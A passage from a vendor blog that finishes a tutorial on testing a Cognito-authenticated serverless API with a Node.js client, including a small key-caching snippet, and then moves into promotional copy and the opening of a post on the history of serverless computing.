Of course Stackery makes it simple to deploy this application into AWS, but it should be pretty easy to give the template directly to CloudFormation. You may want to go through and whack the parameters like ‘StackTagName’ that are added by the Stackery runtime.

Client Tester App

Once you’ve deployed the app, there are a couple of parameters from the running app to be copied to the client. These go in the source code near the top. For instance, the URI of the API Gateway is needed by the client but isn’t available until after the app is deployed.

This may not be an issue for you if you’re doing a web client app instead of a Node.js app, but in my case I’m using the NPM package named amazon-cognito-identity-js to talk to Cognito for authentication. That package depends on the fetch() API, which browsers have but Node.js does not. I’ve included the package source directly in my repo, and added a use of node-fetch-polyfill in amazon-cognito-identity-js/lib/Client.js.

Run ./client-app.js --sign-up --email <email> --password <pass> to create a new user in your Cognito pool. In real apps you should never accept passwords on the command line like this.

Once you’ve created a user, run ./client-app.js --sign-in --email <email> --password <pass>, giving it the new user’s email and password, to get a JWT for the user.

Assuming sign-in succeeds, that command prints the JWT created by Cognito. You can then test the authenticated API with ./client-app.js --fetch --token <JWT>.

Areas for Improvement

This is rather marginal sample code, as I mentioned, and there are several obvious areas for improvement:

  • The amazon-cognito-identity-js package isn’t meant for Node.js. I wonder if it makes sense to use the AWS SDK directly.

  • The AuthenticatedApi function gets public keys from Cognito on every request; they should be cached (see the sketch after this list).

  • The client-app uses the access token, but a real client app would have to be prepared to use the refresh token to generate a new access token periodically.
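
For the caching point, a minimal sketch: stash the key set in module scope so it survives across warm invocations (the node-fetch dependency and the URL construction are assumptions):

const fetch = require('node-fetch');

let cachedJwks = null; // survives for the lifetime of the Lambda container

async function getJwks(region, userPoolId) {
  if (!cachedJwks) {
    const url = `https://cognito-idp.${region}.amazonaws.com/` +
      `${userPoolId}/.well-known/jwks.json`;
    const res = await fetch(url);
    cachedJwks = await res.json();
  }
  return cachedJwks;
}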

Stackery can make all this a lot easier

We’ve described how to get a user pool up and running, and one way to get access to that user pool within the AWS console. If you’re interested in speedrunning this process, Stackery can make this much much easier for you.

Stackery offers a visual tool that lets you plan a new stack with just a few clicks. Connecting resources like your Cognito User Pool and User Pool Client is as simple as drawing a line.

And once you’re happy with your configuration, Stackery can push it to AWS, automatically creating the Serverless Application Model (SAM) template based on your diagram.

Stackery makes it much easier to build and deploy stacks of serverless resources, and there’s a free tier with a complete suite of tools available now.

The Journey to Serverless: How Did We Get Here? [Infographic]
Gracie Gregory | January 08, 2019

It’s the beginning of a new year and when it comes to computing, going serverless is the resolution of many engineering teams. At Stackery, this excites us because we know how significant the positive impacts of serverless are and will be. So much, in fact, that we’re already thinking about its applications for next year and beyond.

But while Stackery is toasting to serverless just as much as the headlines are, it’s crucial at this juncture to ensure that there is a wider foundational understanding. Our team is thrilled that so many others are anxious to rethink how they approach computing, save money with a pay-per-use model, and build without limits using serverless. However, we’re also proponents of knowing your serverless strategy inside and out, thereby having an airtight business use-case that anyone on the team can explain. After all, serverless didn’t rise to the top of Gartner’s top 10 infrastructure and operations trends overnight; its (figurative) source code was being drafted decades ago and this is why it’s much more than a trend. Just as we learned in history class, what’s past is prologue; the developments of yesteryear are the stage directions for today’s innovation. In other words, understanding the origins of serverless will give you a competitive advantage.

So, how exactly did we get to the edge of widespread serverless adoption? What historical developments make all of this more than a temporary buzzword? Why have the conversations about serverless been growing among your peers and leadership team, not dying down? To answer these questions, let’s interrupt our regularly-scheduled New Year celebrations with a trip back in time to 1995…

At Stackery, we’re helping engineering teams build amazing serverless applications with limitless scalability. The best part? The stage for the next decade of software development is being set now. Join us in shaping serverless computing for the next generation. Get started with Stackery today.

Get the Serverless Development Toolkit for Teams now and get started for free. Contact one of our product experts to get started building amazing serverless applications today.
